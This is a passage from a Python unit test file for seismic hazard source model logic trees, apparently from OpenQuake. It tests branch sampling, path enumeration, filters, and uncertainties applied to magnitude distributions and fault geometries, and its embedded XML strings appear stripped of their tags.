error = (\n \"uncertainty of type '%s' must define 'applyToSources'\"\n \" with only one source id\" % uncertainty)\n self.assertEqual(\n exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n\nclass SourceModelLogicTreeTestCase(unittest.TestCase):\n def assert_branch_equal(self, branch, branch_id, weight_str, value,\n child_branchset_args=None):\n self.assertEqual(type(branch), logictree.Branch)\n self.assertEqual(branch.branch_id, branch_id)\n self.assertEqual(branch.weight, Decimal(weight_str))\n self.assertEqual(branch.value, value)\n if child_branchset_args is None:\n self.assertEqual(branch.child_branchset, None)\n else:\n self.assert_branchset_equal(branch.child_branchset,\n *child_branchset_args)\n\n def assert_branchset_equal(self, branchset, uncertainty_type, filters,\n branches_args):\n self.assertEqual(type(branchset), logictree.BranchSet)\n self.assertEqual(branchset.uncertainty_type, uncertainty_type)\n self.assertEqual(branchset.filters, filters)\n self.assertEqual(len(branchset.branches), len(branches_args))\n for branch, args in zip(branchset.branches, branches_args):\n self.assert_branch_equal(branch, *args)\n\n def test_only_source_models(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.6\n \n \n sm2\n 0.4\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree, 'sm1': sm, 'sm2': sm},\n 'basepath', validate=False)\n self.assertEqual(lt.samples_by_lt_path(),\n collections.Counter({('b1',): 1, ('b2',): 1}))\n\n self.assert_branchset_equal(lt.root_branchset, 'sourceModel', {},\n [('b1', '0.6', 'sm1'),\n ('b2', '0.4', 'sm2')])\n\n def test_two_levels(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 0.6\n \n \n -123\n 0.4\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree, 'sm': sm}, '/base',\n validate=False)\n self.assertEqual(\n lt.samples_by_lt_path(),\n collections.Counter({('b1', 'b2'): 1, ('b1', 'b3'): 1}))\n self.assert_branchset_equal(lt.root_branchset,\n 'sourceModel', {},\n [('b1', '1.0', 'sm',\n ('maxMagGRRelative', {},\n [('b2', '0.6', +123),\n ('b3', '0.4', -123)])\n )])\n\n def test_filters(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 100 500\n 0.9\n \n \n -1.23 +0.1\n 0.1\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree, 'sm': sm}, '/base',\n validate=False)\n self.assert_branchset_equal(\n lt.root_branchset,\n 'sourceModel', {},\n [('b1', '1.0', 'sm',\n ('abGRAbsolute', {'applyToSources': ['src01']},\n [('b2', '0.9', (100, 500)),\n ('b3', '0.1', (-1.23, +0.1))])\n )])\n\n def test_apply_to_branches(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.6\n \n \n sm2\n 0.3\n \n \n sm3\n 0.1\n \n \n \n \n \n \n +1\n 1.0\n \n \n \n \n -3\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree,\n 'sm1': sm, 'sm2': sm, 'sm3': sm},\n '/base', validate=False)\n self.assert_branchset_equal(\n lt.root_branchset,\n 'sourceModel', {},\n [('sb1', '0.6', 'sm1',\n ('bGRRelative', {},\n [('b2', '1.0', +1)]\n )),\n ('sb2', '0.3', 'sm2',\n ('maxMagGRAbsolute', {'applyToSources': ['src01']},\n [('b3', '1.0', -3)]\n )),\n ('sb3', '0.1', 'sm3',\n ('bGRRelative', {},\n [('b2', '1.0', +1)]\n ))\n ]\n )\n sb1, sb2, sb3 = lt.root_branchset.branches\n self.assertTrue(sb1.child_branchset is sb3.child_branchset)\n\n def test_comments(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n \n \n \n \n \n sm\n \n 1.0\n \n \n \n \n \n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree, 'sm': sm},\n '/base', validate=False)\n self.assert_branchset_equal(\n lt.root_branchset, 'sourceModel', {}, [('b1', '1.0', 'sm')])\n\n\nclass SampleTestCase(unittest.TestCase):\n\n def test_sample(self):\n branches = [logictree.Branch(1, Decimal('0.2'), 'A'),\n logictree.Branch(1, Decimal('0.3'), 'B'),\n logictree.Branch(1, Decimal('0.5'), 'C')]\n samples = logictree.sample(branches, 1000, 42)\n\n def count(samples, value):\n counter = 0\n for s in samples:\n if s.value == value:\n counter += 1\n return counter\n\n self.assertEqual(count(samples, value='A'), 225)\n self.assertEqual(count(samples, value='B'), 278)\n self.assertEqual(count(samples, value='C'), 497)\n\n def test_sample_broken_branch_weights(self):\n branches = [logictree.Branch(0, Decimal('0.1'), 0),\n logictree.Branch(1, Decimal('0.2'), 1)]\n with self.assertRaises(ValueError):\n logictree.sample(branches, 1000, 42)\n\n def test_sample_one_branch(self):\n # always the same branch is returned\n branches = [logictree.Branch(0, Decimal('1.0'), 0)]\n bs = logictree.sample(branches, 10, 42)\n for b in bs:\n self.assertEqual(b.branch_id, 0)\n\n\nclass BranchSetEnumerateTestCase(unittest.TestCase):\n def test_enumerate(self):\n b0 = logictree.Branch('0', Decimal('0.64'), '0')\n b1 = logictree.Branch('1', Decimal('0.36'), '1')\n b00 = logictree.Branch('0.0', Decimal('0.33'), '0.0')\n b01 = logictree.Branch('0.1', Decimal('0.27'), '0.1')\n b02 = logictree.Branch('0.2', Decimal('0.4'), '0.2')\n b10 = logictree.Branch('1.0', Decimal('1.0'), '1.0')\n b100 = logictree.Branch('1.0.0', Decimal('0.1'), '1.0.0')\n b101 = logictree.Branch('1.0.1', Decimal('0.9'), '1.0.1')\n bs_root = logictree.BranchSet(None, None)\n bs_root.branches = [b0, b1]\n bs0 = logictree.BranchSet(None, None)\n bs0.branches = [b00, b01, b02]\n bs1 = logictree.BranchSet(None, None)\n bs1.branches = [b10]\n b0.child_branchset = bs0\n b1.child_branchset = bs1\n bs10 = logictree.BranchSet(None, None)\n bs10.branches = [b100, b101]\n b10.child_branchset = bs10\n\n ae = self.assertEqual\n\n paths = bs_root.enumerate_paths()\n ae(next(paths), (Decimal('0.2112'), [b0, b00]))\n ae(next(paths), (Decimal('0.1728'), [b0, b01]))\n ae(next(paths), (Decimal('0.256'), [b0, b02]))\n ae(next(paths), (Decimal('0.036'), [b1, b10, b100]))\n ae(next(paths), (Decimal('0.32400'), [b1, b10, b101]))\n self.assertRaises(StopIteration, lambda: next(paths))\n\n paths = bs1.enumerate_paths()\n ae(next(paths), (Decimal('0.1'), [b10, b100]))\n ae(next(paths), (Decimal('0.9'), [b10, b101]))\n self.assertRaises(StopIteration, lambda: next(paths))\n\n\nclass BranchSetGetBranchByIdTestCase(unittest.TestCase):\n def test(self):\n bs = logictree.BranchSet(None, None)\n b1 = logictree.Branch('1', Decimal('0.33'), None)\n b2 = logictree.Branch('2', Decimal('0.33'), None)\n bbzz = logictree.Branch('bzz', Decimal('0.34'), None)\n bs.branches = [b1, b2, bbzz]\n self.assertIs(bs.get_branch_by_id('1'), b1)\n self.assertIs(bs.get_branch_by_id('2'), b2)\n self.assertIs(bs.get_branch_by_id('bzz'), bbzz)\n\n def test_nonexistent_branch(self):\n bs = logictree.BranchSet(None, None)\n br = logictree.Branch('br', Decimal('1.0'), None)\n bs.branches.append(br)\n self.assertRaises(AssertionError, bs.get_branch_by_id, 'bz')\n\n\nclass BranchSetApplyUncertaintyMethodSignaturesTestCase(unittest.TestCase):\n def test_apply_uncertainty_ab_absolute(self):\n mfd = Mock()\n bs = logictree.BranchSet('abGRAbsolute', {})\n bs._apply_uncertainty_to_mfd(mfd, (0.1, 33.4))\n self.assertEqual(mfd.method_calls,\n [('modify', ('set_ab',\n {'a_val': 0.1, 'b_val': 33.4}), {})])\n\n def test_apply_uncertainty_b_relative(self):\n mfd = Mock()\n bs = logictree.BranchSet('bGRRelative', {})\n bs._apply_uncertainty_to_mfd(mfd, -1.6)\n self.assertEqual(mfd.method_calls,\n [('modify', ('increment_b', {'value': -1.6}), {})])\n\n def test_apply_uncertainty_mmax_relative(self):\n mfd = Mock()\n bs = logictree.BranchSet('maxMagGRRelative', {})\n bs._apply_uncertainty_to_mfd(mfd, 32.1)\n self.assertEqual(\n mfd.method_calls,\n [('modify', ('increment_max_mag', {'value': 32.1}), {})])\n\n def test_apply_uncertainty_mmax_absolute(self):\n mfd = Mock()\n bs = logictree.BranchSet('maxMagGRAbsolute', {})\n bs._apply_uncertainty_to_mfd(mfd, 55)\n self.assertEqual(mfd.method_calls,\n [('modify', ('set_max_mag', {'value': 55}), {})])\n\n def test_apply_uncertainty_incremental_mfd_absolute(self):\n mfd = Mock()\n bs = logictree.BranchSet('incrementalMFDAbsolute', {})\n bs._apply_uncertainty_to_mfd(mfd, (8.0, 0.1, [0.01, 0.005]))\n self.assertEqual(\n mfd.method_calls,\n [('modify', ('set_mfd', {'min_mag': 8.0,\n 'bin_width': 0.1,\n 'occurrence_rates': [0.01, 0.005]}), {})]\n )\n\n def test_apply_uncertainty_simple_fault_dip_relative(self):\n source = Mock()\n bs = logictree.BranchSet('simpleFaultDipRelative', {})\n bs._apply_uncertainty_to_geometry(source, 15.0)\n self.assertEqual(\n source.method_calls,\n [('modify', ('adjust_dip', {'increment': 15.0}), {})])\n\n def test_apply_uncertainty_simple_fault_dip_absolute(self):\n source = Mock()\n bs = logictree.BranchSet('simpleFaultDipAbsolute', {})\n bs._apply_uncertainty_to_geometry(source, 45.0)\n self.assertEqual(\n source.method_calls,\n [('modify', ('set_dip', {'dip': 45.0}), {})])\n\n def test_apply_uncertainty_simple_fault_geometry_absolute(self):\n source = Mock()\n trace = geo.Line([geo.Point(0., 0.), geo.Point(1., 1.)])\n bs = logictree.BranchSet('simpleFaultGeometryAbsolute', {})\n bs._apply_uncertainty_to_geometry(source,\n (trace, 0.0, 10.0, 90.0, 1.0))\n self.assertEqual(\n source.method_calls,\n [('modify', ('set_geometry', {'fault_trace': trace,\n 'upper_seismogenic_depth': 0.0,\n 'lower_seismogenic_depth': 10.0,\n 'dip': 90.0,\n 'spacing': 1.0}), {})])\n\n def test_apply_uncertainty_complex_fault_geometry_absolute(self):\n source = Mock()\n edges = [\n geo.Line([geo.Point(0.0, 0.0, 0.0), geo.Point(1.0, 0.0, 0.0)]),\n geo.Line([geo.Point(0.0, -0.1, 10.0), geo.Point(1.0, -0.1, 10.0)])\n ]\n bs = logictree.BranchSet('complexFaultGeometryAbsolute', {})\n bs._apply_uncertainty_to_geometry(source, (edges, 5.0))\n self.assertEqual(\n source.method_calls,\n [('modify', ('set_geometry', {'edges': edges,\n 'spacing': 5.0}), {})])\n\n def test_apply_uncertainty_characteristic_fault_geometry_absolute(self):\n source = Mock()\n trace = geo.Line([geo.Point(0., 0.), geo.Point(1., 1.)])\n surface = geo.SimpleFaultSurface.from_fault_data(\n trace, 0.0, 10.0, 90.0, 1.0)\n bs = logictree.BranchSet('characteristicFaultGeometryAbsolute', {})\n bs._apply_uncertainty_to_geometry(source, surface)\n self.assertEqual(\n source.method_calls,\n [('modify', ('set_geometry', {'surface': surface}), {})])\n\n def test_apply_uncertainty_unknown_uncertainty_type(self):\n bs = logictree.BranchSet('makeMeFeelGood', {})\n self.assertRaises(AssertionError,\n bs.apply_uncertainty, None, None)\n\n\nclass BranchSetApplyUncertaintyTestCase(unittest.TestCase):\n def setUp(self):\n self.point_source = openquake.hazardlib.source.PointSource(\n source_id='point', name='point',\n tectonic_region_type=\n openquake.hazardlib.const.TRT.ACTIVE_SHALLOW_CRUST,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n nodal_plane_distribution=PMF(\n [(1, openquake.hazardlib.geo.NodalPlane(0.0, 90.0, 0.0))]\n ),\n hypocenter_distribution=PMF([(1, 10)]),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, location=openquake.hazardlib.geo.Point(\n 5, 6),\n rupture_mesh_spacing=1.0,\n temporal_occurrence_model=PoissonTOM(50.)\n )\n\n def test_unknown_source_type(self):\n bs = logictree.BranchSet('maxMagGRRelative',\n {'applyToSourceType': 'forest'})\n self.assertRaises(AssertionError, bs.apply_uncertainty,\n -1, self.point_source)\n\n def test_relative_uncertainty(self):\n uncertainties = [('maxMagGRRelative', +1),\n ('bGRRelative', -0.2)]\n for uncertainty, value in uncertainties:\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, self.point_source)\n self.assertEqual(self.point_source.mfd.max_mag, 6.5 + 1)\n self.assertEqual(self.point_source.mfd.b_val, 0.9 - 0.2)\n\n def test_absolute_uncertainty(self):\n uncertainties = [('maxMagGRAbsolute', 9),\n ('abGRAbsolute', (-1, 0.2))]\n for uncertainty, value in uncertainties:\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, self.point_source)\n self.assertEqual(self.point_source.mfd.max_mag, 9)\n self.assertEqual(self.point_source.mfd.b_val, 0.2)\n self.assertEqual(self.point_source.mfd.a_val, -1)\n\n def test_absolute_incremental_mfd_uncertainty(self):\n inc_point_source = openquake.hazardlib.source.PointSource(\n source_id='point', name='point',\n tectonic_region_type=\n openquake.hazardlib.const.TRT.ACTIVE_SHALLOW_CRUST,\n mfd=EvenlyDiscretizedMFD(min_mag=8.0, bin_width=0.2,\n occurrence_rates=[0.5, 0.1]),\n nodal_plane_distribution=PMF(\n [(1, openquake.hazardlib.geo.NodalPlane(0.0, 90.0, 0.0))]\n ),\n hypocenter_distribution=PMF([(1, 10)]),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, location=openquake.hazardlib.geo.Point(\n 5, 6),\n rupture_mesh_spacing=1.0,\n temporal_occurrence_model=PoissonTOM(50.)\n )\n self.assertEqual(inc_point_source.mfd.min_mag, 8.0)\n self.assertEqual(inc_point_source.mfd.bin_width, 0.2)\n self.assertEqual(inc_point_source.mfd.occurrence_rates[0], 0.5)\n self.assertEqual(inc_point_source.mfd.occurrence_rates[1], 0.1)\n uncertainty, value = ('incrementalMFDAbsolute',\n (8.5, 0.1, [0.05, 0.01]))\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, inc_point_source)\n self.assertEqual(inc_point_source.mfd.min_mag, 8.5)\n self.assertEqual(inc_point_source.mfd.bin_width, 0.1)\n self.assertEqual(inc_point_source.mfd.occurrence_rates[0], 0.05)\n self.assertEqual(inc_point_source.mfd.occurrence_rates[1], 0.01)\n\n\nclass BranchSetApplyGeometryUncertaintyTestCase(unittest.TestCase):\n def setUp(self):\n self.trace = geo.Line([geo.Point(30., 30.), geo.Point(31., 30.)])\n self.fault_source = self._make_simple_fault_source(self.trace, 0.,\n 10., 60., 1.)\n\n def _make_simple_fault_source(self, trace, usd, lsd, dip, spacing):\n return openquake.hazardlib.source.SimpleFaultSource(\n source_id=\"SFLT0\", name=\"Simple Fault\",\n tectonic_region_type=\"Active Shallow Crust\",\n mfd=EvenlyDiscretizedMFD(min_mag=7.0, bin_width=0.1,\n occurrence_rates=[0.01]),\n rupture_mesh_spacing=spacing,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1.0,\n temporal_occurrence_model=PoissonTOM(50.),\n upper_seismogenic_depth=usd, lower_seismogenic_depth=lsd,\n fault_trace=trace, dip=dip, rake=90.0)\n\n def _make_complex_fault_source(self, edges, spacing):\n return openquake.hazardlib.source.ComplexFaultSource(\n source_id=\"CFLT0\", name=\"Complex Fault\",\n tectonic_region_type=\"Active Shallow Crust\",\n mfd=EvenlyDiscretizedMFD(min_mag=7.0, bin_width=0.1,\n occurrence_rates=[0.01]),\n rupture_mesh_spacing=spacing,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1.0,\n temporal_occurrence_model=PoissonTOM(50.),\n edges=edges, rake=90.0)\n\n def _make_planar_surface(self, planes):\n surfaces = []\n for plane in planes:\n top_left = geo.Point(plane[0, 0], plane[0, 1], plane[0, 2])\n top_right = geo.Point(plane[1, 0], plane[1, 1], plane[1, 2])\n bottom_right = geo.Point(plane[2, 0], plane[2, 1], plane[2, 2])\n bottom_left = geo.Point(plane[3, 0], plane[3, 1], plane[3, 2])\n surfaces.append(geo.PlanarSurface.from_corner_points(\n top_left, top_right, bottom_right, bottom_left))\n\n if len(surfaces) > 1:\n return geo.MultiSurface(surfaces)\n else:\n return surfaces[0]\n\n def _make_characteristic_fault_source(self, surface):\n return openquake.hazardlib.source.CharacteristicFaultSource(\n source_id=\"CHARFLT0\", name=\"Characteristic Fault\",\n tectonic_region_type=\"Active Shallow Crust\",\n mfd=EvenlyDiscretizedMFD(min_mag=7.0, bin_width=0.1,\n occurrence_rates=[0.01]),\n temporal_occurrence_model=PoissonTOM(50.),\n surface=surface, rake=90)\n\n def test_simple_fault_dip_relative_uncertainty(self):\n self.assertAlmostEqual(self.fault_source.dip, 60.)\n new_fault_source = deepcopy(self.fault_source)\n uncertainty, value = ('simpleFaultDipRelative', -15.)\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, new_fault_source)\n self.assertAlmostEqual(new_fault_source.dip, 45.)\n\n def test_simple_fault_dip_absolute_uncertainty(self):\n self.assertAlmostEqual(self.fault_source.dip, 60.)\n new_fault_source = deepcopy(self.fault_source)\n uncertainty, value = ('simpleFaultDipAbsolute', 55.)\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, new_fault_source)\n self.assertAlmostEqual(new_fault_source.dip, 55.)\n\n def test_simple_fault_geometry_uncertainty(self):\n new_fault_source = deepcopy(self.fault_source)\n new_trace = geo.Line([geo.Point(30.5, 30.0), geo.Point(31.2, 30.)])\n new_dip = 50.\n new_lsd = 12.\n new_usd = 1.\n uncertainty, value = ('simpleFaultGeometryAbsolute',\n (new_trace, new_usd, new_lsd, new_dip, 1.0))\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, new_fault_source)\n self.assertEqual(new_fault_source.fault_trace, new_trace)\n self.assertAlmostEqual(new_fault_source.upper_seismogenic_depth, 1.)\n self.assertAlmostEqual(new_fault_source.lower_seismogenic_depth, 12.)\n self.assertAlmostEqual(new_fault_source.dip, 50.)\n\n def test_complex_fault_geometry_uncertainty(self):\n top_edge = geo.Line([geo.Point(30.0, 30.1, 0.0),\n geo.Point(31.0, 30.1, 1.0)])\n bottom_edge = geo.Line([geo.Point(30.0, 30.0, 10.0),\n geo.Point(31.0, 30.0, 9.0)])\n fault_source = self._make_complex_fault_source([top_edge, bottom_edge],\n 2.0)\n new_top_edge = geo.Line([geo.Point(30.0, 30.2, 0.0),\n geo.Point(31.0, 30.2, 0.0)])\n new_bottom_edge = geo.Line([geo.Point(30.0, 30.0, 10.0),\n geo.Point(31.0, 30.0, 10.0)])\n\n uncertainty, value = ('complexFaultGeometryAbsolute',\n ([new_top_edge, new_bottom_edge], 2.0))\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, fault_source)\n self.assertEqual(fault_source.edges[0], new_top_edge)\n self.assertEqual(fault_source.edges[1], new_bottom_edge)\n\n def test_characteristic_fault_planar_geometry_uncertainty(self):\n # Define 2-plane fault\n plane1 = numpy.array([[30.0, 30.0, 0.0],\n [30.5, 30.0, 0.0],\n [30.5, 30.0, 10.0],\n [30.0, 30.0, 10.0]])\n plane2 = numpy.array([[30.5, 30.0, 0.0],\n [30.5, 30.5, 0.0],\n [30.5, 30.5, 10.0],\n [30.5, 30.0, 10.0]])\n surface = self._make_planar_surface([plane1, plane2])\n fault_source = self._make_characteristic_fault_source(surface)\n # Move the planes\n plane3 = numpy.array([[30.1, 30.0, 0.0],\n [30.6, 30.0, 0.0],\n [30.6, 30.0, 10.0],\n [30.1, 30.0, 10.0]])\n plane4 = numpy.array([[30.6, 30.0, 0.0],\n [30.6, 30.5, 0.0],\n [30.6, 30.5, 10.0],\n [30.6, 30.0, 10.0]])\n new_surface = self._make_planar_surface([plane3, plane4])\n uncertainty, value = ('characteristicFaultGeometryAbsolute',\n new_surface)\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, fault_source)\n # Only the longitudes are changing\n numpy.testing.assert_array_almost_equal(\n fault_source.surface.surfaces[0].corner_lons,\n numpy.array([30.1, 30.6, 30.1, 30.6]))\n numpy.testing.assert_array_almost_equal(\n fault_source.surface.surfaces[1].corner_lons,\n numpy.array([30.6, 30.6, 30.6, 30.6]))\n\n def test_characteristic_fault_simple_geometry_uncertainty(self):\n trace = geo.Line([geo.Point(30., 30.), geo.Point(31., 30.)])\n usd = 0.0\n lsd = 10.0\n dip = 45.\n # Surface\n surface = geo.SimpleFaultSurface.from_fault_data(trace, usd, lsd, dip,\n 1.0)\n surface.dip = 45.0\n fault_source = self._make_characteristic_fault_source(surface)\n # Modify dip\n new_surface = geo.SimpleFaultSurface.from_fault_data(trace, usd, lsd,\n 65., 1.0)\n uncertainty, value = ('characteristicFaultGeometryAbsolute',\n new_surface)\n new_surface.dip = 65.0\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, fault_source)\n self.assertAlmostEqual(fault_source.surface.get_dip(), 65.)\n\n def test_characteristic_fault_complex_geometry_uncertainty(self):\n top_edge = geo.Line([geo.Point(30.0, 30.1, 0.0),\n geo.Point(31.0, 30.1, 1.0)])\n bottom_edge = geo.Line([geo.Point(30.0, 30.0, 10.0),\n geo.Point(31.0, 30.0, 9.0)])\n surface = geo.ComplexFaultSurface.from_fault_data(\n [top_edge, bottom_edge],\n 5.)\n fault_source = self._make_characteristic_fault_source(surface)\n # New surface\n new_top_edge = geo.Line([geo.Point(30.0, 30.2, 0.0),\n geo.Point(31.0, 30.2, 0.0)])\n new_bottom_edge = geo.Line([geo.Point(30.0, 30.0, 10.0),\n geo.Point(31.0, 30.0, 10.0)])\n\n new_surface = geo.ComplexFaultSurface.from_fault_data(\n [new_top_edge, new_bottom_edge], 5.)\n uncertainty, value = ('characteristicFaultGeometryAbsolute',\n new_surface)\n branchset = logictree.BranchSet(uncertainty, {})\n branchset.apply_uncertainty(value, fault_source)\n # If the surface has changed the first element in the latitude\n # array of the surface mesh should be 30.2\n self.assertAlmostEqual(new_surface.mesh.lats[0, 0], 30.2)\n\n\nclass BranchSetFilterTestCase(unittest.TestCase):\n def setUp(self):\n self.point = openquake.hazardlib.source.PointSource(\n source_id='point', name='point',\n tectonic_region_type=\n openquake.hazardlib.const.TRT.ACTIVE_SHALLOW_CRUST,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n nodal_plane_distribution=PMF(\n [(1, openquake.hazardlib.geo.NodalPlane(0.0, 90.0, 0.0))]\n ),\n hypocenter_distribution=PMF([(1, 10)]),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, location=openquake.hazardlib.geo.Point(\n 5, 6),\n rupture_mesh_spacing=1.0,\n temporal_occurrence_model=PoissonTOM(50.),\n )\n self.area = openquake.hazardlib.source.AreaSource(\n source_id='area', name='area',\n tectonic_region_type=\n openquake.hazardlib.const.TRT.ACTIVE_SHALLOW_CRUST,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n nodal_plane_distribution=PMF(\n [(1, openquake.hazardlib.geo.NodalPlane(0.0, 90.0, 0.0))]\n ),\n hypocenter_distribution=PMF([(1, 10)]),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1,\n polygon=openquake.hazardlib.geo.Polygon(\n [openquake.hazardlib.geo.Point(0, 0),\n openquake.hazardlib.geo.Point(0, 1),\n openquake.hazardlib.geo.Point(1, 0)]),\n area_discretization=10, rupture_mesh_spacing=1.0,\n temporal_occurrence_model=PoissonTOM(50.),\n )\n self.simple_fault = openquake.hazardlib.source.SimpleFaultSource(\n source_id='simple_fault', name='simple fault',\n tectonic_region_type=openquake.hazardlib.const.TRT.VOLCANIC,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n upper_seismogenic_depth=0.0, lower_seismogenic_depth=10.0,\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, rupture_mesh_spacing=2.0,\n fault_trace=openquake.hazardlib.geo.Line(\n [openquake.hazardlib.geo.Point(0, 0),\n openquake.hazardlib.geo.Point(1, 1)]),\n dip=45, rake=180,\n temporal_occurrence_model=PoissonTOM(50.)\n )\n self.complex_fault = openquake.hazardlib.source.ComplexFaultSource(\n source_id='complex_fault', name='complex fault',\n tectonic_region_type=openquake.hazardlib.const.TRT.VOLCANIC,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n magnitude_scaling_relationship=\n openquake.hazardlib.scalerel.PeerMSR(),\n rupture_aspect_ratio=1, rupture_mesh_spacing=2.0, rake=0,\n edges=[openquake.hazardlib.geo.Line(\n [openquake.hazardlib.geo.Point(0, 0, 1),\n openquake.hazardlib.geo.Point(1, 1, 1)]),\n openquake.hazardlib.geo.Line(\n [openquake.hazardlib.geo.Point(0, 0, 2),\n openquake.hazardlib.geo.Point(1, 1, 2)])],\n temporal_occurrence_model=PoissonTOM(50.),\n )\n\n lons = numpy.array([-1., 1., -1., 1.])\n lats = numpy.array([0., 0., 0., 0.])\n depths = numpy.array([0., 0., 10., 10.])\n\n points = [openquake.hazardlib.geo.Point(lon, lat, depth)\n for lon, lat, depth in\n zip(lons, lats, depths)]\n self.characteristic_fault = \\\n openquake.hazardlib.source.CharacteristicFaultSource(\n source_id='characteristic_fault',\n name='characteristic fault',\n tectonic_region_type=openquake.hazardlib.const.TRT.VOLCANIC,\n mfd=TruncatedGRMFD(a_val=3.1, b_val=0.9, min_mag=5.0,\n max_mag=6.5, bin_width=0.1),\n surface=openquake.hazardlib.geo.PlanarSurface(\n strike=0.0, dip=90.0,\n top_left=points[0], top_right=points[1],\n bottom_right=points[3], bottom_left=points[2]\n ),\n rake=0,\n temporal_occurrence_model=PoissonTOM(50.))\n\n def test_unknown_filter(self):\n bs = logictree.BranchSet(None, {'applyToSources': [1], 'foo': 'bar'})\n self.assertRaises(AssertionError, bs.filter_source, None)\n\n def test_source_type(self):\n bs = logictree.BranchSet(None, {'applyToSourceType': 'area'})\n for src in (self.simple_fault, self.complex_fault, self.point,\n self.characteristic_fault):\n self.assertEqual(bs.filter_source(src), False)\n self.assertEqual(bs.filter_source(self.area), True)\n\n bs = logictree.BranchSet(None, {'applyToSourceType': 'point'})\n for source in (self.simple_fault, self.complex_fault, self.area,\n self.characteristic_fault):\n self.assertEqual(bs.filter_source(source), False)\n self.assertEqual(bs.filter_source(self.point), True)\n\n bs = logictree.BranchSet(\n None, {'applyToSourceType': 'simpleFault'}\n )\n for source in (self.complex_fault, self.point, self.area,\n self.characteristic_fault):\n self.assertEqual(bs.filter_source(source), False)\n self.assertEqual(bs.filter_source(self.simple_fault), True)\n\n bs = logictree.BranchSet(\n None, {'applyToSourceType': 'complexFault'}\n )\n for source in (self.simple_fault, self.point, self.area,\n self.characteristic_fault):\n self.assertEqual(bs.filter_source(source), False)\n self.assertEqual(bs.filter_source(self.complex_fault), True)\n\n bs = logictree.BranchSet(\n None, {'applyToSourceType': 'characteristicFault'}\n )\n for source in (self.simple_fault, self.point, self.area,\n self.complex_fault):\n self.assertEqual(bs.filter_source(source), False)\n self.assertEqual(bs.filter_source(self.characteristic_fault), True)\n\n def test_tectonic_region_type(self):\n test = lambda trt, source: \\\n logictree.BranchSet(None, {'applyToTectonicRegionType': trt}) \\\n .filter_source(source)\n\n asc = 'Active Shallow Crust'\n vlc = 'Volcanic'\n ssc = 'Stable Shallow Crust'\n sif = 'Subduction Interface'\n sic = 'Subduction IntraSlab'\n\n source = self.simple_fault\n\n source.tectonic_region_type = sic\n for wrong_trt in (asc, vlc, ssc, sif):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(sic, source), True)\n\n source.tectonic_region_type = vlc\n for wrong_trt in (asc, sic, ssc, sif):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(vlc, source), True)\n\n source.tectonic_region_type = sif\n for wrong_trt in (asc, vlc, ssc, sic):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(sif, source), True)\n\n source.tectonic_region_type = ssc\n for wrong_trt in (asc, vlc, sic, sif):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(ssc, source), True)\n\n source.tectonic_region_type = asc\n for wrong_trt in (sic, vlc, ssc, sif):\n self.assertEqual(test(wrong_trt, source), False)\n self.assertEqual(test(asc, source), True)\n\n def test_sources(self):\n test = lambda sources, source, expected_result: self.assertEqual(\n logictree.BranchSet(\n None, 